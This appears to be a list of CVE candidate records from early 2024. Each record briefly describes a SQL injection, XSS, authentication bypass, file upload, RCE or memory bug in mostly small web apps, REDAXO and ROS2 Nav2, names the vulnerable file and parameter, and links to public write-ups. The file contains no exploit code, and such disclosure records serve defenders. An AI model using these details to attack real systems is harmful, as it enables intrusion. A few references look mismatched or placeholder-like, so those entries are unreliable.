CVE    2024    25306    Candidate    Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'aname' parameter at "School/index.php".    MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20SQL%20Injection%20-1.md    Assigned (20240207)
CVE    2024    25305    Candidate    Code-projects Simple School Managment System 1.0 allows Authentication Bypass via the username and password parameters at School/index.php.    MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20Authentication%20Bypass.md    Assigned (20240207)
CVE    2024    25304    Candidate    Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'apass' parameter at "School/index.php."    MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20SQL%20Injection%20-2.md    Assigned (20240207)
CVE    2024    25302    Candidate    Sourcecodester Event Student Attendance System 1.0 allows SQL Injection via the 'student' parameter.    MISC:https://github.com/tubakvgc/CVE/blob/main/Event_Student_Attendance_System.md    Assigned (20240207)
CVE    2024    25301    Candidate    Redaxo v5.15.1 was discovered to contain a remote code execution (RCE) vulnerability via the component /pages/templates.php.    MISC:https://github.com/WoodManGitHub/MyCVEs/blob/main/2024-REDAXO/RCE.md   |   MISC:https://github.com/evildrummer/MyOwnCVEs/tree/main/CVE-2021-39459    Assigned (20240207)
CVE    2024    25300    Candidate    A cross-site scripting (XSS) vulnerability in Redaxo v5.15.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter in the Template section.    MISC:https://github.com/WoodManGitHub/MyCVEs/blob/main/2024-REDAXO/XSS.md    Assigned (20240207)
CVE    2024    2530    Candidate    A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/update-rooms.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256967. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256967 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256967   |   MISC:VDB-256967 | MAGESH-K21 Online-College-Event-Hall-Reservation-System update-rooms.php cross site scripting   |   URL:https://vuldb.com/?id.256967   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20update-rooms.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20update-rooms.php.md    Assigned (20240315)
CVE    2024    25298    Candidate    An issue in REDAXO version 5.15.1 allows attackers to execute arbitrary code and obtain sensitive information via modules.modules.php.    MISC:https://github.com/CpyRe/I-Find-CVE-2024/blob/main/REDAXO%20RCE.md    Assigned (20240207)
CVE    2024    25297    Candidate    Cross Site Scripting (XSS) vulnerability in Bludit CMS version 3.15 allows remote attackers to execute arbitrary code and obtain sensitive information via edit-content.php.    MISC:https://github.com/CpyRe/I-Find-CVE-2024/blob/main/BLUDIT%20Stored%20XSS.md    Assigned (20240207)
CVE    2024    25294    Candidate    An SSRF issue in REBUILD v.3.5 allows a remote attacker to obtain sensitive information and execute arbitrary code via the FileDownloader.java, proxyDownload,URL parameters.    MISC:http://rebuild.com   |   MISC:https://deeply-capri-1c8.notion.site/REBUILD-V3-5-2023-12-11-SSRF-30324be04e00477eae472bf75f4f5e0d   |   MISC:https://github.com/getrebuild/rebuild/    Assigned (20240207)
CVE    2024    25293    Candidate    mjml-app versions 3.0.4 and 3.1.0-beta were discovered to contain a remote code execution (RCE) via the href attribute.    MISC:https://github.com/EQSTLab/PoC/tree/main/2024/LCE/CVE-2024-25293    Assigned (20240207)
CVE    2024    25292    Candidate    Cross-site scripting (XSS) vulnerability in RenderTune v1.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Upload Title parameter.    MISC:https://github.com/ji-zzang/EQST-PoC/tree/main/2024/RCE/CVE-2024-25292    Assigned (20240207)
CVE    2024    25291    Candidate    Deskfiler v1.2.3 allows attackers to execute arbitrary code via uploading a crafted plugin.    MISC:https://github.com/ji-zzang/EQST-PoC/tree/main/2024/RCE/CVE-2024-25291    Assigned (20240207)
CVE    2024    2529    Candidate    A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/rooms.php. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256966 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256966 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256966   |   MISC:VDB-256966 | MAGESH-K21 Online-College-Event-Hall-Reservation-System rooms.php unrestricted upload   |   URL:https://vuldb.com/?id.256966   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Arbitrary%20File%20Upload%20-%20rooms.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Arbitrary%20File%20Upload%20-%20rooms.php.md    Assigned (20240315)
CVE    2024    25288    Candidate    SLIMS (Senayan Library Management Systems) 9 Bulian v9.6.1 is vulnerable to SQL Injection via pop-scope-vocabolary.php.    MISC:https://github.com/Vuln0wned/slims_owned/blob/main/slims/slims9-bulian-9.6.1-SQLI-pop_scope_vocabolary.md   |   MISC:https://github.com/slims/slims9_bulian/issues/229    Assigned (20240207)
CVE    2024    2528    Candidate    A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/update-rooms.php. The manipulation of the argument room_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256965 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256965 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256965   |   MISC:VDB-256965 | MAGESH-K21 Online-College-Event-Hall-Reservation-System update-rooms.php sql injection   |   URL:https://vuldb.com/?id.256965   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20update-rooms.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20update-rooms.php.md    Assigned (20240315)
CVE    2024    25274    Candidate    An arbitrary file upload vulnerability in the component /sysFile/upload of Novel-Plus v4.3.0-RC1 allows attackers to execute arbitrary code via uploading a crafted file.    MISC:https://gist.github.com/capable-Hub/725c294f1aeac729fa314a32fef55d5a   |   MISC:https://reference1.example.com/login    Assigned (20240207)
CVE    2024    2527    Candidate    A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/rooms.php. The manipulation of the argument room_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256964. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256964 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256964   |   MISC:VDB-256964 | MAGESH-K21 Online-College-Event-Hall-Reservation-System rooms.php sql injection   |   URL:https://vuldb.com/?id.256964   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20rooms.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20rooms.php.md    Assigned (20240315)
CVE    2024    25269    Candidate    libheif <= 1.17.6 contains a memory leak in the function JpegEncoder::Encode. This flaw allows an attacker to cause a denial of service attack.    MISC:https://github.com/strukturag/libheif/issues/1073    Assigned (20240207)
CVE    2024    25262    Candidate    texlive-bin commit c515e was discovered to contain a heap buffer overflow via the function ttfLoadHDMX:ttfdump. This vulnerability allows attackers to cause a Denial of Service (DoS) via supplying a crafted TTF file.    MISC:https://bugs.launchpad.net/ubuntu/+source/texlive-bin/+bug/2047912   |   MISC:https://tug.org/svn/texlive/trunk/Build/source/texk/ttfdump/ChangeLog?revision=69605&view=co    Assigned (20240207)
CVE    2024    25260    Candidate    elfutils v0.189 was discovered to contain a NULL pointer dereference via the handle_verdef() function at readelf.c.    MISC:https://github.com/schsiung/fuzzer_issues/issues/1   |   MISC:https://sourceware.org/bugzilla/show_bug.cgi?id=31058   |   MISC:https://sourceware.org/elfutils/    Assigned (20240207)
CVE    2024    2526    Candidate    A vulnerability has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/rooms.php. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256963. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256963 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256963   |   MISC:VDB-256963 | MAGESH-K21 Online-College-Event-Hall-Reservation-System rooms.php cross site scripting   |   URL:https://vuldb.com/?id.256963   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20rooms.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20rooms.php.md    Assigned (20240315)
CVE    2024    25251    Candidate    code-projects Agro-School Management System 1.0 suffers from Incorrect Access Control.    MISC:https://code-projects.org/agro-school-management-system-in-php-with-source-code/   |   MISC:https://github.com/ASR511-OO7/CVE-2024-25251/blob/main/CVE-17    Assigned (20240207)
CVE    2024    25250    Candidate    SQL Injection vulnerability in code-projects Agro-School Management System 1.0 allows attackers to run arbitrary code via the Login page.    MISC:https://github.com/ASR511-OO7/CVE-2024-25250./blob/main/CVE-38    Assigned (20240207)
CVE    2024    2525    Candidate    A vulnerability, which was classified as problematic, was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected is an unknown function of the file /admin/receipt.php. The manipulation of the argument id leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256962 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256962 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256962   |   MISC:VDB-256962 | MAGESH-K21 Online-College-Event-Hall-Reservation-System receipt.php cross site scripting   |   URL:https://vuldb.com/?id.256962   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20receipt.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20receipt.php.md    Assigned (20240315)
CVE    2024    25249    Candidate    An issue in He3 App for macOS version 2.0.17 allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.    MISC:https://github.com/intbjw   |   MISC:https://github.com/intbjw/CVE-2024-25249   |   MISC:https://www.electronjs.org/blog/statement-run-as-node-cves    Assigned (20240207)
CVE    2024    25248    Candidate    SQL Injection vulnerability in the orderGoodsDelivery() function in Niushop B2B2C V5 allows attackers to run arbitrary SQL commands via the order_id parameter.    MISC:https://harryha.substack.com/p/phuong-phap-phan-tich-ma-nguon-tim-lo-hong    Assigned (20240207)
CVE    2024    25247    Candidate    SQL Injection vulnerability in /app/api/controller/Store.php in Niushop B2B2C V5 allows attackers to run arbitrary SQL commands via latitude and longitude parameters.    MISC:https://harryha.substack.com/p/phuong-phap-phan-tich-ma-nguon-tim-lo-hong    Assigned (20240207)
CVE    2024    2524    Candidate    A vulnerability, which was classified as critical, has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This issue affects some unknown processing of the file /admin/receipt.php. The manipulation of the argument room_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256961 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256961   |   MISC:VDB-256961 | MAGESH-K21 Online-College-Event-Hall-Reservation-System receipt.php sql injection   |   URL:https://vuldb.com/?id.256961   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20receipt.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20receipt.php.md    Assigned (20240315)
CVE    2024    25239    Candidate    SQL Injection vulnerability in Sourcecodester Employee Management System v1.0 allows attackers to run arbitrary SQL commands via crafted POST request to /emloyee_akpoly/Account/login.php.    MISC:https://blu3ming.github.io/sourcecodester-employee-management-system-sql-injection/    Assigned (20240207)
CVE    2024    2523    Candidate    A vulnerability classified as problematic was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This vulnerability affects unknown code of the file /admin/booktime.php. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256960. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256960 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256960   |   MISC:VDB-256960 | MAGESH-K21 Online-College-Event-Hall-Reservation-System booktime.php cross site scripting   |   URL:https://vuldb.com/?id.256960   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20booktime.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20booktime.php.md    Assigned (20240315)
CVE    2024    25228    Candidate    Vinchin Backup and Recovery 7.2 and Earlier is vulnerable to Authenticated Remote Code Execution (RCE) via the getVerifydiyResult function in ManoeuvreHandler.class.php.    FULLDISC:20240313 [Full Disclosure] CVE-2024-25228: Unpatched Command Injection in Vinchin Backup & Recovery Versions 7.2 and Earlier   |   URL:https://seclists.org/fulldisclosure/2024/Mar/15   |   MISC:https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/    Assigned (20240207)
CVE    2024    25227    Candidate    SQL Injection vulnerability in ABO.CMS version 5.8 allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via the tb_login parameter in the admin login page.    MISC:https://thetrueartist.wixsite.com/cveblog/post/understanding-the-potential-impact-of-cve-2024-25227-what-you-need-to-know-and-how-it-was-discovered    Assigned (20240207)
CVE    2024    25226    Candidate    A cross-site scripting (XSS) vulnerability in Simple Admin Panel App v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Category Name parameter under the Add Category function.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Supplier%20Managment%20System/Supplier%20Managment%20System%20-%20SQL%20Injection.md    Assigned (20240207)
CVE    2024    25224    Candidate    A cross-site scripting (XSS) vulnerability in Simple Admin Panel App v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Size Number parameter under the Add Size function.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Simple%20Admin%20Panel%20App/Simple%20Admin%20Panel%20App%20-%20Cross-Site-Scripting%20-%202.md    Assigned (20240207)
CVE    2024    25223    Candidate    Simple Admin Panel App v1.0 was discovered to contain a SQL injection vulnerability via the orderID parameter at /adminView/viewEachOrder.php.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Simple%20Admin%20Panel%20App/Simple%20Admin%20Panel%20App%20-%20SQL%20Injection.md    Assigned (20240207)
CVE    2024    25222    Candidate    Task Manager App v1.0 was discovered to contain a SQL injection vulnerability via the projectID parameter at /TaskManager/EditProject.php.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Task%20Manager%20App/Task%20Manager%20App%20-%20SQL%20Injection%20-%201.md    Assigned (20240207)
CVE    2024    25221    Candidate    A cross-site scripting (XSS) vulnerability in Task Manager App v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note Section parameter at /TaskManager/Tasks.php.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Task%20Manager%20App/Task%20Manager%20App%20-%20Cross-Site-Scripting%20-3.md    Assigned (20240207)
CVE    2024    25220    Candidate    Task Manager App v1.0 was discovered to contain a SQL injection vulnerability via the taskID parameter at /TaskManager/EditTask.php.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Task%20Manager%20App/Task%20Manager%20App%20-%20SQL%20Injection%20-%202.md    Assigned (20240207)
CVE    2024    2522    Candidate    A vulnerability classified as critical has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This affects an unknown part of the file /admin/booktime.php. The manipulation of the argument room_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256959. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256959 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256959   |   MISC:VDB-256959 | MAGESH-K21 Online-College-Event-Hall-Reservation-System booktime.php sql injection   |   URL:https://vuldb.com/?id.256959   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20booktime.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20booktime.php.md    Assigned (20240315)
CVE    2024    25219    Candidate    A cross-site scripting (XSS) vulnerability in Task Manager App v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Task Name parameter at /TaskManager/Task.php.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Task%20Manager%20App/Task%20Manager%20App%20-%20Cross-Site-Scripting%20-%202.md    Assigned (20240207)
CVE    2024    25218    Candidate    A cross-site scripting (XSS) vulnerability in Task Manager App v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Project Name parameter at /TaskManager/Projects.php.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Task%20Manager%20App/Task%20Manager%20App%20-%20Cross-Site-Scripting%20-1.md    Assigned (20240207)
CVE    2024    25217    Candidate    Online Medicine Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /omos/?p=products/view_product.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Online%20Medicine%20Ordering%20System/OMOS%20-%20SQL%20Injection(Unauthenticated).md    Assigned (20240207)
CVE    2024    25216    Candidate    Employee Managment System v1.0 was discovered to contain a SQL injection vulnerability via the mailud parameter at /aprocess.php.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Employee%20Management%20System/Employee%20Managment%20System%20-%20SQL%20Injection%20-%201.md    Assigned (20240207)
CVE    2024    25215    Candidate    Employee Managment System v1.0 was discovered to contain a SQL injection vulnerability via the pwd parameter at /aprocess.php.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Employee%20Management%20System/Employee%20Managment%20System%20-%20SQL%20Injection%20-%202.md    Assigned (20240207)
CVE    2024    25214    Candidate    An issue in Employee Managment System v1.0 allows attackers to bypass authentication via injecting a crafted payload into the E-mail and Password parameters at /alogin.html.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Employee%20Management%20System/Employee%20Managment%20System%20-%20Authentication%20Bypass.md    Assigned (20240207)
CVE    2024    25213    Candidate    Employee Managment System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /edit.php.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Employee%20Management%20System/Employee%20Managment%20System%20-%20SQL%20Injection%20-%203.md    Assigned (20240207)
CVE    2024    25212    Candidate    Employee Managment System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /delete.php.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Employee%20Management%20System/Employee%20Managment%20System%20-%20SQL%20Injection%20-%204.md    Assigned (20240207)
CVE    2024    25211    Candidate    Simple Expense Tracker v1.0 was discovered to contain a SQL injection vulnerability via the category parameter at /endpoint/delete_category.php.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Simple%20Expense%20Tracker/Simple%20Expense%20Tracker%20-%20SQL%20Injection-2.md    Assigned (20240207)
CVE    2024    25210    Candidate    Simple Expense Tracker v1.0 was discovered to contain a SQL injection vulnerability via the expense parameter at /endpoint/delete_expense.php.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Simple%20Expense%20Tracker/Simple%20Expense%20Tacker%20-%20SQL%20Injection-1.md    Assigned (20240207)
CVE    2024    2521    Candidate    A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/bookdate.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256958 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256958 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256958   |   MISC:VDB-256958 | MAGESH-K21 Online-College-Event-Hall-Reservation-System bookdate.php cross site scripting   |   URL:https://vuldb.com/?id.256958   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20bookdate.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20bookdate.php.md    Assigned (20240315)
CVE    2024    25209    Candidate    Barangay Population Monitoring System 1.0 was discovered to contain a SQL injection vulnerability via the resident parameter at /endpoint/delete-resident.php.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Barangay%20Population%20Monitoring%20System/Barangay%20Population%20System%20-%20SQL%20Injection.md    Assigned (20240207)
CVE    2024    25208    Candidate    Barangay Population Monitoring System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the Add Resident function at /barangay-population-monitoring-system/masterlist.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Full Name parameter.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Barangay%20Population%20Monitoring%20System/Barangay%20Population%20System%20-%20XSS-1.md    Assigned (20240207)
CVE    2024    25207    Candidate    Barangay Population Monitoring System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the Add Resident function at /barangay-population-monitoring-system/masterlist.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Contact Number parameter.    MISC:https://github.com/BurakSevben/CVEs/blob/main/Barangay%20Population%20Monitoring%20System/Barangay%20Population%20System%20-%20XSS-2.md    Assigned (20240207)
CVE    2024    25202    Candidate    Cross Site Scripting vulnerability in Phpgurukul User Registration & Login and User Management System 1.0 allows attackers to run arbitrary code via the search bar.    MISC:https://drive.google.com/file/d/1oMNcChsXPMP9pu9lIE2C11n8mzkmLhcY/view   |   MISC:https://github.com/Agampreet-Singh/CVE-2024-25202   |   MISC:https://medium.com/@agampreetsingh_93704/cve-2024-25202-discover-by-agampreet-singh-cyber-security-expert-ff8e32f5cf52    Assigned (20240207)
CVE    2024    25201    Candidate    Espruino 2v20 (commit fcc9ba4) was discovered to contain an Out-of-bounds Read via jsvStringIteratorPrintfCallback at src/jsvar.c.    MISC:https://github.com/espruino/Espruino/issues/2456    Assigned (20240207)
CVE    2024    25200    Candidate    Espruino 2v20 (commit fcc9ba4) was discovered to contain a Stack Overflow via the jspeFactorFunctionCall at src/jsparse.c.    MISC:https://github.com/espruino/Espruino/issues/2457    Assigned (20240207)
CVE    2024    2520    Candidate    A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/bookdate.php. The manipulation of the argument room_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256957 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256957 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256957   |   MISC:VDB-256957 | MAGESH-K21 Online-College-Event-Hall-Reservation-System bookdate.php sql injection   |   URL:https://vuldb.com/?id.256957   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20bookdate.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20bookdate.php.md    Assigned (20240315)
CVE    2024    25199    Candidate    Inappropriate pointer order of map_sub_ and map_free(map_) (amcl_node.cpp) in Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions leads to a use-after-free.    MISC:https://github.com/ros-planning/navigation2/blob/main/nav2_amcl/src/amcl_node.cpp#L331-L344   |   MISC:https://github.com/ros-planning/navigation2/pull/4078   |   MISC:https://github.com/ros-planning/navigation2/pull/4079    Assigned (20240207)
CVE    2024    25198    Candidate    Inappropriate pointer order of laser_scan_filter_.reset() and tf_listener_.reset() (amcl_node.cpp) in Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions leads to a use-after-free.    MISC:https://github.com/ros-planning/navigation2/blob/main/nav2_amcl/src/amcl_node.cpp#L331-L344   |   MISC:https://github.com/ros-planning/navigation2/pull/4068   |   MISC:https://github.com/ros-planning/navigation2/pull/4070    Assigned (20240207)
CVE    2024    25197    Candidate    Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions were discovered to contain a NULL pointer dereference via the isCurrent() function at /src/layered_costmap.cpp.    MISC:https://github.com/ros-planning/navigation2/issues/3940   |   MISC:https://github.com/ros-planning/navigation2/issues/3958   |   MISC:https://github.com/ros-planning/navigation2/issues/3971   |   MISC:https://github.com/ros-planning/navigation2/issues/3972    Assigned (20240207)
CVE    2024    25196    Candidate    Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions were discovered to contain a buffer overflow via the nav2_controller process. This vulnerability is triggered via sending a crafted .yaml file.    MISC:https://github.com/ros-planning/navigation2/issues/4005   |   MISC:https://github.com/ros-planning/navigation2/pull/4017   |   MISC:https://robotics.stackexchange.com/questions/106008/ros2nav2user-misconfiguration-of-parameters-may-cause-instantaneous-crashs    Assigned (20240207)
CVE    2024    25191    Candidate    php-jwt 1.0.0 uses strcmp (which is not constant time) to verify authentication, which makes it easier to bypass authentication via a timing side channel.    MISC:https://github.com/P3ngu1nW/CVE_Request/blob/main/cdoco%3Aphp-jwt.md    Assigned (20240207)
CVE    2024    25190    Candidate    l8w8jwt 2.2.1 uses memcmp (which is not constant time) to verify authentication, which makes it easier to bypass authentication via a timing side channel.    MISC:https://github.com/P3ngu1nW/CVE_Request/blob/main/GlitchedPolygons%3Al8w8jwt.md    Assigned (20240207)
CVE    2024    2519    Candidate    A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been classified as problematic. Affected is an unknown function of the file navbar.php. The manipulation of the argument id leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256956. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256956 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256956   |   MISC:VDB-256956 | MAGESH-K21 Online-College-Event-Hall-Reservation-System navbar.php cross site scripting   |   URL:https://vuldb.com/?id.256956   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20navbar.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20navbar.php.md    Assigned (20240315)
